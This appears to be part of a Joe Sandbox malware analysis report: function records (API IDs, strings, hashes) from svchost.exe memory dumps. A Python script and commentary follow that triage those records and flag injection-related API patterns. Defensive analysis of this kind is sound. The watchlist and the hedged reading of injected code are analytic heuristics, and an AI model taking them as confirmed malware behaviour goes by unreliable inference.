                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FinalHandleNamePathlstrlen
                                                        • String ID: \\?\
                                                        • API String ID: 2719912262-4282027825
                                                        • Opcode ID: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction ID: 13d5538f2ae6fa1a42b57c4935466a6d4d2f3ef02a1b7b3d65ff422c2a4f55fa
                                                        • Opcode Fuzzy Hash: a3d7cacd1ebb440911515f68b3794a8df69f5abb31c63e6f26f50beb6be48af3
                                                        • Instruction Fuzzy Hash: 2CF0443275869592F7219B55F4E43D96371F74578CF848022DA4D46654EF7CC68DC700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                        • String ID: CorExitProcess$mscoree.dll
                                                        • API String ID: 4061214504-1276376045
                                                        • Opcode ID: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction ID: de6d3a793f8961d7db89080c54d518dc201812c7f05fee8bdb25630fb0bc1cb0
                                                        • Opcode Fuzzy Hash: e9186c1451144fd021b714c5c272bd718a2131959171b64afe02b1703c1f89a6
                                                        • Instruction Fuzzy Hash: 67F08271B29A1081FF464FA0E8A47E52770EF8AB48F48141BA44F463A0EF38C4ECC310
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread
                                                        • String ID:
                                                        • API String ID: 2882836952-0
                                                        • Opcode ID: 5eb0f69eaa28739e7a3b5d30c3b7e3077147b945ee367a274f52b7d5e5995563
                                                        • Instruction ID: df54e37cd1bacfb0d1eaac2903c943d60593f9e8d287c52316c6a2aa98a45e07
                                                        • Opcode Fuzzy Hash: 5eb0f69eaa28739e7a3b5d30c3b7e3077147b945ee367a274f52b7d5e5995563
                                                        • Instruction Fuzzy Hash: 9C02B83662DB9486E761CB59E49039AB7B1F3C5794F104116EACE87BA8DF7CC458CB00
                                                        APIs
                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00000179537B09C2
                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000179537B093F,?,?,?,00000179537AE263), ref: 00000179537B0A80
                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000179537B093F,?,?,?,00000179537AE263), ref: 00000179537B0B0A
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                        • String ID:
                                                        • API String ID: 2210144848-0
                                                        • Opcode ID: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction ID: 55b7a1aa93c86277cdfc95052223a7cc852c0b41211f4772ea7fec6daadce431
                                                        • Opcode Fuzzy Hash: 6ea8d1c03a27889c2a76d2fa2108f5730873fa6bd6da2ede6083719aa30d033f
                                                        • Instruction Fuzzy Hash: 7E81D032E18A7489FB629F6498A07EE2BB1F746B9CF444117DE0E53B91FB348449C710
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000003.1829522378.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_3_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: dd4ff6265f6b4cd38b2e7c3e24edd108bbaa736065270b1acd5fa8270f663acf
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: 4611C272E5CA3001F7661268E4623E997707B9777CF180727EA7F473D69A18894DC200
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _set_statfp
                                                        • String ID:
                                                        • API String ID: 1156100317-0
                                                        • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction ID: 0952cd0018406b670d3bd6cc0bca658b50102c8ef326c43d102b2efb4b1de044
                                                        • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                        • Instruction Fuzzy Hash: F3118A32E5DA2901F75B1524D4773E55370AB5737CF144627EF7E4A3E6AA18488DC304
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentProcessProtectVirtual$HandleModule
                                                        • String ID:
                                                        • API String ID: 1092925422-0
                                                        • Opcode ID: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction ID: 8ea45ca38991729d93b33ef2d54d166a038282f39921ddbbf8f073f231299308
                                                        • Opcode Fuzzy Hash: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
                                                        • Instruction Fuzzy Hash: 84117036B1C76492FB169F65E4142A9A3B1FB4AB88F040026DE8D07B94EF3DC548C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID: pid_
                                                        • API String ID: 517849248-4147670505
                                                        • Opcode ID: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction ID: 3e867b7d4d189a9cd719c490165554fb6eb336014189e9f604563abfe8a1f8ef
                                                        • Opcode Fuzzy Hash: c190cf9c84f4fec237682ecde889163a3056c2ee0c0182666c83aa3720f1176d
                                                        • Instruction Fuzzy Hash: 6E119036B28B6091FB52DB65E8153DA63B0F786788F8040229E4D83B94EF29C94DCB40
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction ID: e78f26ca184d764000d89565f007e055ff26359903c14b84110eba1c98e71f14
                                                        • Opcode Fuzzy Hash: 675c280ff13286ce7d146578b7a03c3a8db6339f083b3ff198ff4cd99f23170e
                                                        • Instruction Fuzzy Hash: 1F015E32A18FA0C6E705DFA6E81818977B8F789F88F494426EA4D43718EF38C499C740
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction ID: dc0b507d5e09e8eac221445b1832d89422a8f0a473ec454f1eb2ac7a0768d18a
                                                        • Opcode Fuzzy Hash: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
                                                        • Instruction Fuzzy Hash: 0871A332A187A186F76ADF2698543EE67B1F38B788F440017EE4D53B98DE34C6899700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000003.1829522378.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_3_17953770000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: HIJKLMNOPQRSTUVWXYZ$bad array new length
                                                        • API String ID: 3215553584-4137334423
                                                        • Opcode ID: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction ID: 6bc2694769228161bd14d36e3a6bfcb1cb197da451946efb8bacc1e32d88d287
                                                        • Opcode Fuzzy Hash: f0e5866417592c2ff8c3377a202dd0391a84e675177e715dfbe21364aa16f179
                                                        • Instruction Fuzzy Hash: D761A031E0C76482FAA79B2595403ED6BF4F74778CF15452BDA0E177A0DA38CA4E8310
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction ID: 2145b32293d8455ca781e841aa1131d5b0ada0deb8261f70c7fb98eec7146ba9
                                                        • Opcode Fuzzy Hash: ba97a2cfb4494a9593318773eec94a3c4e74a75ef8f777109a467670aa1db902
                                                        • Instruction Fuzzy Hash: 5A111F32A18B5482EB128F15F54039977B5FB89B98F184221DF8D07754DF3CC555C700
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
                                                        • Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2946667615.00000179537B3000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2947430953.00000179537BD000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948178325.00000179537BF000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000013.00000002.2948931761.00000179537C5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                        • String ID: InitializeCriticalSectionEx
                                                        • API String ID: 539475747-3084827643
                                                        • Opcode ID: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction ID: 6f59caf677cd616514c29672b532e05b8789abae37375141e2129ee3131dacc8
                                                        • Opcode Fuzzy Hash: e64e4740045ae81cdb2e514f923c51f250565fc9a097f0243aa16987f787090b
                                                        • Instruction Fuzzy Hash: BDF0E231B18B60C1FB169B81F4506D92370EB4ABD8F484127EA0D03B95DE38C5ADC340
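The records above are the per-function entries Joe Sandbox's IDA plugin recovered from the two svchost.exe dumps of process index 0x13 (snapshots hcaresult_19_3_17953770000_svchost.jbxd and hcaresult_19_2_179537a0000_svchost.jbxd). Two things in them are worth noticing when reading such a block by hand. Several API IDs are MSVC CRT internals (_invalid_parameter_noinfo, _set_statfp, try_get_function resolving InitializeCriticalSectionEx), which suggests a statically linked native payload rather than svchost.exe's own code; the _set_statfp function is present in both dumps with the same Opcode ID but different Instruction IDs and Instruction Fuzzy Hashes, consistent with the same code recovered at two different base addresses. The remaining records carry API sets that matter inside a system process: GetCurrentProcess/VirtualProtect/GetModuleHandle, a function that references the \\.\pipe\ prefix, and one that mixes Open/Process/FindClose style calls with the string "pid_". The script below, an added example that is not part of this report and not Joe Sandbox code, parses the pasted entries into records, drops the fused "Download File" link text, and triages each function into CRT noise versus candidates to open in IDA. The assumption that an API ID is the alphabetically sorted words of each API name concatenated, with "$" between groups (so VirtualProtect appears as ProtectVirtual), is ours, inferred from the entries on this page; the watchlist rules are also ours, and SAMPLE is three records copied from above.

```python
"""Triage the per-function 'Similarity' records Joe Sandbox emits for a memory dump.

Added example; not part of the report and not Joe Sandbox code. Input is the report
page pasted as text (bullet lines, panel labels, fused 'Download File' link text).
"""
import re
from collections import defaultdict

# Constructed sample: three records copied from the svchost.exe (process index
# 0x13 = 19) dumps of this report, with the extraction indentation removed.
SAMPLE = r"""
APIs
Memory Dump Source
• Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
• Associated: 00000013.00000002.2944981979.00000179537A0000.00000002.00000001.00020000.00000000.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID:
• Opcode ID: f49a43d8567c213b337cf74c33d87ea9f8b0f1b984059dad2b4cd4689300dbc7
APIs
Strings
Memory Dump Source
• Source File: 00000013.00000002.2945741012.00000179537A1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000179537A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_179537a0000_svchost.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• Opcode ID: 64816e4cd3ccee350da6ce7bbddcd7399f42add8e1b6bc9b0cc6ea827a19452e
APIs
Memory Dump Source
• Source File: 00000013.00000003.1829522378.0000017953770000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000017953770000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_3_17953770000_svchost.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
"""

BULLET_RE = re.compile(r"^•\s*([^:]+):\s*(.*)$")
# Words of an API ID: CamelCase fragments, or lowercase/underscore CRT names.
WORD_RE = re.compile(r"[A-Z][a-z]*|[a-z_][a-z_]*")
# Lowercase CRT internals: statically linked runtime, not attacker logic.
CRT_MARKERS = ("_invalid_parameter_noinfo", "_set_statfp", "try_get_function")
# Assumption (ours): API IDs are the sorted words of each API name concatenated,
# "$" between groups, so VirtualProtect reads "ProtectVirtual". Word-level
# matching is lossy; every hit must be confirmed in the disassembly.
WATCH = [
    ({"Protect", "Virtual"}, "VirtualProtect: page protection rewritten (unpacker/shellcode staging)"),
    ({"Open", "Process"}, "Open+Process words: possible OpenProcess, confirm in IDA"),
    ({"Create", "Thread"}, "Create+Thread words: possible thread creation, confirm in IDA"),
]


def parse_entries(text):
    """Split pasted report text into one dict per function record."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":  # every function record opens with its 'APIs' panel label
            cur = {"associated": []}
            entries.append(cur)
            continue
        m = BULLET_RE.match(line)
        if m is None or cur is None:
            continue
        key, val = m.group(1).strip(), m.group(2).strip()
        if val.endswith("Download File"):  # link text fused onto the dump file name
            val = val[: -len("Download File")].strip()
        if key == "Associated":
            cur["associated"].append(val)
        elif key == "Source File":  # "<dump>, Offset: <base>, based on PE: <bool>"
            parts = [p.strip() for p in val.split(",")]
            cur["Source File"] = parts[0]
            for p in parts[1:]:
                k, _, v = p.partition(":")
                cur[k.strip()] = v.strip()
        else:
            cur[key] = val
    return entries


def triage(entry):
    """Return (verdict, reasons): 'crt' noise, 'flag' worth opening, or 'plain'."""
    api_id = entry.get("API ID", "")
    if any(mk in api_id for mk in CRT_MARKERS):
        return "crt", ["MSVC CRT internal: " + api_id]
    words = set(WORD_RE.findall(api_id))
    reasons = [why for need, why in WATCH if need <= words]
    if "\\\\.\\pipe\\" in entry.get("String ID", ""):
        reasons.append("named-pipe prefix \\\\.\\pipe\\ referenced: local IPC channel")
    return ("flag" if reasons else "plain"), reasons


def summarize(text):
    """Group verdicts per snapshot so the dump carrying injected logic stands out."""
    by_snap = defaultdict(lambda: {"entries": 0, "crt": 0, "flagged": []})
    for e in parse_entries(text):
        verdict, reasons = triage(e)
        s = by_snap[e.get("Snapshot File", "?")]
        s["entries"] += 1
        if verdict == "crt":
            s["crt"] += 1
        elif verdict == "flag":
            s["flagged"].append((e.get("API ID", ""), e.get("Opcode ID", "")[:16], reasons))
    return dict(by_snap)


if __name__ == "__main__":
    for snap, s in summarize(SAMPLE).items():
        print(f"{snap}: {s['entries']} functions, {s['crt']} CRT, {len(s['flagged'])} flagged")
        for api_id, opcode, reasons in s["flagged"]:
            print(f"  {opcode}  {api_id}")
            for r in reasons:
                print("     -", r)
```

Run it on the whole function list of a report rather than on SAMPLE: paste the page text into a file and call summarize(open(path, encoding="utf-8").read()). The Opcode ID prefix printed per flagged function is the key to search for in the report to jump to that record; because Opcode ID is stable across dumps of the same code while Instruction ID is not, it is also the better key for de-duplicating functions seen in several snapshots.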